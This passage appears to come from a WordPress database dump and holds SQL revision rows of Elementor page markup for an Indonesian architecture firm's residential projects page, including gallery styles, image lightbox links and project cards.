var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxMiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTEuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxMywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTIuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTMuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-4.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-4\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTQuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-5.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-5\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTUuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-6.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-6\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTYuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-7.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-7\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxOCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTcuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>','Residential','','inherit','closed','closed','','560-revision-v1','','','2023-09-22 08:37:59','2023-09-22 08:37:59','',560,'https://bauhaus.futuremediatrix.com/?p=4855',0,'revision','',0),(4856,3,'2023-09-22 08:37:59','2023-09-22 08:37:59','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n							<p> Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya. </p>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxMiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTEuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxMywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTIuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTMuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-4.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-4\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTQuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-5.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-5\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTUuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-6.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-6\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTYuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-7.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-7\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxOCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTcuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>','Residential','','inherit','closed','closed','','560-revision-v1','','','2023-09-22 08:37:59','2023-09-22 08:37:59','',560,'https://bauhaus.futuremediatrix.com/?p=4856',0,'revision','',0),(4857,3,'2023-09-22 08:37:59','2023-09-22 08:37:59','<h3>our recent work</h3>\n														<h2>\n								Bauhaus Residential Projects							</h2>\n							<p> Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya. </p>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		